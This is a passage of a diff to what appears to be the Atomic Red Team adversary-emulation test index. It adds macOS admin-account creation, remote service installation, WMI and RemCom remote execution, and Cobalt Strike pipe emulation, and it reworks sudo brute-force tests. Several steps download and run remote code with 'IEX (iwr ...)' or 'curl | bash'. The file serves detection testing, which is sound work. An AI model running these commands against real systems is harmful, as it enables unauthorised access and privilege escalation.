+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
     - name: WinPwn - Loot local Credentials - powerhell kittie
       auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
       description: Loot local Credentials - powerhell kittie technique via function
@@ -30757,6 +31273,54 @@ privilege-escalation:
           reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
         name: command_prompt
         elevation_required: true
+    - name: Remote Service Installation CMD
+      auto_generated_guid: fb4151a2-db33-4f8c-b7f8-78ea8790f961
+      description: |
+        Download an executable from github and start it as a service on a remote endpoint
+        Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
+      supported_platforms:
+      - windows
+      input_arguments:
+        binary_path:
+          description: Name of the service binary, include path.
+          type: path
+          default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe
+        service_type:
+          description: Type of service. May be own,share,interact,kernel,filesys,rec,userown,usershare
+          type: String
+          default: Own
+        startup_type:
+          description: Service start method. May be boot,system,auto,demand,disabled,delayed-auto
+          type: String
+          default: auto
+        service_name:
+          description: Name of the Service
+          type: string
+          default: AtomicTestService_CMD
+        remote_host:
+          description: Name of the remote endpoint
+          type: string
+          default: localhost
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Service binary must exist on disk at specified location (#{binary_path})
+
+          '
+        prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: |
+          sc.exe \\#{remote_host} create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}
+          sc.exe \\#{remote_host} start #{service_name}
+        cleanup_command: |-
+          sc.exe \\#{remote_host} stop #{service_name} >nul 2>&1
+          sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
   T1053.003:
     technique:
       x_mitre_platforms:
@@ -38610,6 +39174,49 @@ privilege-escalation:
         cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
           Processor" -Name "AutoRun" -ErrorAction Ignore
         name: powershell
+    - name: WMI Invoke-CimMethod Start Process
+      auto_generated_guid: adae83d3-0df6-45e7-b2c3-575f91584577
+      description: |
+        The following Atomic will create a New-CimSession on a remote endpoint and start a process usnig Invoke-CimMethod.
+        This is a novel way to perform lateral movement or to start a remote process.
+        This does require WinRM to be enabled. The account performing the run will also need to be elevated.
+        A successful execution will stdout that the process started. On the remote endpoint, wmiprvse.exe will spawn the given process.
+      supported_platforms:
+      - windows
+      input_arguments:
+        dest:
+          description: destination computer name
+          type: string
+          default: localhost
+        password:
+          description: password for account
+          type: string
+          default: P@ssword1
+        username:
+          description: account to use
+          type: string
+          default: Administrator
+        process:
+          description: process to spawn
+          type: string
+          default: calc.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "# Set the remote computer name and credentials\n $RemoteComputer
+          = \"#{dest}\"\n $PWord = ConvertTo-SecureString -String \"#{password}\"
+          -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential
+          -ArgumentList \"#{username}\", $Pword\n\n # Create a CIM session\n $CimSession
+          = New-CimSession -ComputerName $RemoteComputer -Credential $Credential\n\n
+          # Define the process you want to start\n $ProcessToStart = \"#{process}\"\n\n
+          # Invoke the Create method on the Win32_Process class to start the process\n
+          $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process
+          -MethodName Create -Arguments @{CommandLine = $ProcessToStart}\n\n # Check
+          the result\n if ($Result.ReturnValue -eq 0) {\n     Write-Host \"Process
+          started successfully with Process ID: $($Result.ProcessId)\"\n } else {\n
+          \    Write-Host \"Failed to start the process. Error code: $($Result.ReturnValue)\"\n
+          }\n\n # Clean up the CIM session\n Remove-CimSession -CimSession $CimSession
+          \n"
   T1546.004:
     technique:
       x_mitre_platforms:
@@ -42623,6 +43230,45 @@ privilege-escalation:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
     - name: WinPwn - Loot local Credentials - powerhell kittie
       auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
       description: Loot local Credentials - powerhell kittie technique via function
@@ -45895,6 +46541,10 @@ execution:
           description: Command to run
           type: string
           default: uname
+        path:
+          description: Path to busybox.yaml file
+          type: string
+          default: "$PathtoAtomicsFolder/T1609/src/busybox.yaml"
       dependencies:
       - description: 'kubectl must be installed
 
@@ -45907,7 +46557,9 @@ execution:
           '
       executor:
         command: |
-          kubectl create -f src/busybox.yaml -n #{namespace}
+          kubectl create -f #{path} -n #{namespace}
+          # wait 3 seconds for the instance to come up
+          sleep 3
           kubectl exec -n #{namespace} busybox -- #{command}
         cleanup_command: 'kubectl delete pod busybox -n #{namespace}
 
@@ -45926,11 +46578,6 @@ execution:
         '
       supported_platforms:
       - containers
-      input_arguments:
-        command:
-          description: Command to run
-          type: string
-          default: cat
       dependencies:
       - description: 'docker must be installed
 
@@ -47914,7 +48561,158 @@ execution:
       - User
       - SYSTEM
       x_mitre_remote_support: true
-    atomic_tests: []
+      identifier: T1559
+    atomic_tests:
+    - name: Cobalt Strike Artifact Kit pipe
+      auto_generated_guid: bd13b9fc-b758-496a-b81a-397462f82c72
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          1
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike Lateral Movement (psexec_psh) pipe
+      auto_generated_guid: 830c8b6c-7a70-4f40-b975-8bbe74558acd
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          2
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike SSH (postex_ssh) pipe
+      auto_generated_guid: d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          3
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike post-exploitation pipe (4.2 and later)
+      auto_generated_guid: 7a48f482-246f-4aeb-9837-21c271ebf244
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          4
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike post-exploitation pipe (before 4.2)
+      auto_generated_guid: 8dbfc15c-527b-4ab0-a272-019f469d367f
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          5
+
+          '
+        name: command_prompt
   T1204.003:
     technique:
       x_mitre_platforms:
@@ -49309,6 +50107,49 @@ execution:
           \ncmd.exe /c \"fsutil behavior set SymlinkEvaluation R2R:0\"\nrm $env:temp\\psexec.exe\n"
         name: powershell
         elevation_required: true
+    - name: Use RemCom to execute a command on a remote host
+      auto_generated_guid: a5d8cdeb-be90-43a9-8b26-cc618deac1e0
+      description: |
+        Requires having RemCom installed, path to RemCom is one of the input input_arguments
+        Will start a process on a remote host.
+        Upon successful execution, cmd will utilize RemCom.exe to spawn calc.exe on a remote endpoint (default:localhost).
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_host:
+          description: Remote hostname or IP address
+          type: string
+          default: localhost
+        user_name:
+          description: Username
+          type: string
+          default: Administrator
+        password:
+          description: Password
+          type: string
+          default: P@ssw0rd1
+        remcom_exe:
+          description: Path to RemCom
+          type: string
+          default: "$pathtoatomicsfolder\\T1569.002\\bin\\remcom.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'RemCom tool must exist on disk at specified location (#{remcom_exe})
+
+          '
+        prereq_command: 'if (Test-Path "#{remcom_exe}") { exit 0} else { exit 1}
+
+          '
+        get_prereq_command: 'Invoke-WebRequest "https://github.com/kavika13/RemCom/raw/master/bin/Release/RemCom.exe"
+          -OutFile "#{remcom_exe}"
+
+          '
+      executor:
+        command: '"#{remcom_exe}" \\#{remote_host} /user:#{user_name} /pwd:#{password}
+          cmd.exe
+
+          '
+        name: command_prompt
   T1053.002:
     technique:
       x_mitre_platforms:
@@ -52318,6 +53159,54 @@ persistence:
           reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
         name: command_prompt
         elevation_required: true
+    - name: Remote Service Installation CMD
+      auto_generated_guid: fb4151a2-db33-4f8c-b7f8-78ea8790f961
+      description: |
+        Download an executable from github and start it as a service on a remote endpoint
+        Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
+      supported_platforms:
+      - windows
+      input_arguments:
+        binary_path:
+          description: Name of the service binary, include path.
+          type: path
+          default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe
+        service_type:
+          description: Type of service. May be own,share,interact,kernel,filesys,rec,userown,usershare
+          type: String
+          default: Own
+        startup_type:
+          description: Service start method. May be boot,system,auto,demand,disabled,delayed-auto
+          type: String
+          default: auto
+        service_name:
+          description: Name of the Service
+          type: string
+          default: AtomicTestService_CMD
+        remote_host:
+          description: Name of the remote endpoint
+          type: string
+          default: localhost
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Service binary must exist on disk at specified location (#{binary_path})
+
+          '
+        prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: |
+          sc.exe \\#{remote_host} create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}
+          sc.exe \\#{remote_host} start #{service_name}
+        cleanup_command: |-
+          sc.exe \\#{remote_host} stop #{service_name} >nul 2>&1
+          sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
   T1053.003:
     technique:
       x_mitre_platforms:
@@ -60919,7 +61808,8 @@ persistence:
           type: string
           default: p4sswd
         user_principal_name:
-          description: Name of the targeted user (user principal)
+          description: Display Name, or User Principal Name, of the targeted user
+            principal
           type: string
           default: SuperUser
         role_name:
@@ -60944,7 +61834,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzureAD -Credential $Credential
 
-          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
           if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -60956,7 +61846,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzureAD -Credential $Credential -ErrorAction Ignore
 
-          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
           if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -61058,7 +61948,8 @@ persistence:
           type: string
           default: p4sswd
         user_principal_name:
-          description: Name of the targeted user (user principal)
+          description: Display Name, or User Principal Name, of the targeted user
+            principal
           type: string
           default: SuperUser
         role_name:
@@ -61087,7 +61978,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzAccount -Credential $Credential
 
-          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
           if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -61102,7 +61993,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzAccount -Credential $Credential -ErrorAction Ignore
 
-          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
           if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -62510,6 +63401,49 @@ persistence:
         cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
           Processor" -Name "AutoRun" -ErrorAction Ignore
         name: powershell
+    - name: WMI Invoke-CimMethod Start Process
+      auto_generated_guid: adae83d3-0df6-45e7-b2c3-575f91584577
+      description: |
+        The following Atomic will create a New-CimSession on a remote endpoint and start a process usnig Invoke-CimMethod.
+        This is a novel way to perform lateral movement or to start a remote process.
+        This does require WinRM to be enabled. The account performing the run will also need to be elevated.
+        A successful execution will stdout that the process started. On the remote endpoint, wmiprvse.exe will spawn the given process.
+      supported_platforms:
+      - windows
+      input_arguments:
+        dest:
+          description: destination computer name
+          type: string
+          default: localhost
+        password:
+          description: password for account
+          type: string
+          default: P@ssword1
+        username:
+          description: account to use
+          type: string
+          default: Administrator
+        process:
+          description: process to spawn
+          type: string
+          default: calc.exe
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "# Set the remote computer name and credentials\n $RemoteComputer
+          = \"#{dest}\"\n $PWord = ConvertTo-SecureString -String \"#{password}\"
+          -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential
+          -ArgumentList \"#{username}\", $Pword\n\n # Create a CIM session\n $CimSession
+          = New-CimSession -ComputerName $RemoteComputer -Credential $Credential\n\n
+          # Define the process you want to start\n $ProcessToStart = \"#{process}\"\n\n
+          # Invoke the Create method on the Win32_Process class to start the process\n
+          $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process
+          -MethodName Create -Arguments @{CommandLine = $ProcessToStart}\n\n # Check
+          the result\n if ($Result.ReturnValue -eq 0) {\n     Write-Host \"Process
+          started successfully with Process ID: $($Result.ProcessId)\"\n } else {\n
+          \    Write-Host \"Failed to start the process. Error code: $($Result.ReturnValue)\"\n
+          }\n\n # Clean up the CIM session\n Remove-CimSession -CimSession $CimSession
+          \n"
   T1546.004:
     technique:
       x_mitre_platforms:
@@ -66992,6 +67926,45 @@ persistence:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
     - name: WinPwn - Loot local Credentials - powerhell kittie
       auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
       description: Loot local Credentials - powerhell kittie technique via function
@@ -74699,81 +75672,6 @@ credential-access:
             }
           }
           Write-Host "End of bruteforce"
-    - name: SUDO brute force Debian
-      auto_generated_guid: 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a
-      description: |
-        Attempts to sudo with current user using passwords from a list.  Will run sudo 3 times, each with 3 different password attempts.
-        PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
-        If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
-        The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
-      supported_platforms:
-      - linux
-      dependency_executor_name: sh
-      dependencies:
-      - description: 'Check if running on a Debian based machine.
-
-          '
-        prereq_command: |
-          if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
-          if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
-          cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
-          cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
-          if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-        get_prereq_command: 'apt-get update && apt-get install -y sudo
-
-          '
-      executor:
-        elevation_required: false
-        command: |
-          for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
-          echo done
-        cleanup_command: 'rm -f /tmp/asker /tmp/workingfile
-
-          '
-        name: sh
-    - name: SUDO brute force Redhat
-      auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade
-      description: "Brute force the password of a local user account which is a member
-        of the sudo'ers group on a Redhat based Linux distribution.  \n"
-      supported_platforms:
-      - linux
-      dependency_executor_name: sh
-      dependencies:
-      - description: 'Check if running on a Redhat based machine.
-
-          '
-        prereq_command: |
-          if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi
-          if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
-          if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-          if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
-        get_prereq_command: 'yum -y update && yum install -y openssl sudo
-
-          '
-      executor:
-        elevation_required: true
-        command: |
-          useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target
-          su target
-
-          PASSWORDS=(one two three password five); \
-              touch /tmp/file; \
-              for P in ${PASSWORDS[@]}; do \
-                  date +"%b %d %T"; \
-                  sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
-                  echo "exit: $?"; \
-                  if grep -q "root" /tmp/file; then \
-                      echo "FOUND: sudo => $P"; break; \
-                  else \
-                      echo "TRIED: $P"; \
-                  fi; \
-                  sleep 2; \
-              done; \
-              rm /tmp/file
-        cleanup_command: 'userdel target
-
-          '
-        name: sh
     - name: Password Brute User using Kerbrute Tool
       auto_generated_guid: 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4
       description: 'Bruteforce a single user''s password from a wordlist
@@ -74819,6 +75717,92 @@ credential-access:
         elevation_required: false
         command: "cd $env:temp\n.\\kerbrute.exe bruteuser --dc #{domaincontroller}
           -d #{domain} $env:temp\\bruteuser.txt TestUser1 \n"
+    - name: SUDO Brute Force - Debian
+      auto_generated_guid: ba1bf0b6-f32b-4db0-b7cc-d78cacc76700
+      description: "An adversary may find themselves on a box (e.g. via ssh key auth,
+        with no password) with a user that has sudo'ers privileges, but they do not
+        know the users password. Normally, failed attempts to access root will not
+        cause the root account to become locked, to prevent denial-of-service. This
+        functionality enables an attacker to undertake a local brute force password
+        guessing attack without locking out the root user. \n\nThis test creates the
+        \"art\" user with a password of \"password123\", logs in, downloads and executes
+        the sudo_bruteforce.sh which brute force guesses the password, then deletes
+        the user\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        remote_url:
+          description: url of remote payload
+          type: Url
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Check if running on a Debian based machine.
+
+          '
+        prereq_command: |
+          if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
+          if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
+          if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+          if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+          if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+        get_prereq_command: 'apt update && apt install -y openssl sudo curl
+
+          '
+      executor:
+        name: bash
+        elevation_required: true
+        command: |
+          useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
+          su art
+          cd /tmp
+          curl -s #{remote_url} |bash
+        cleanup_command: 'userdel -fr art
+
+          '
+    - name: SUDO Brute Force - Redhat
+      auto_generated_guid: 4097bc00-5eeb-4d56-aaf9-287d60351d95
+      description: "An adversary may find themselves on a box (e.g. via ssh key auth,
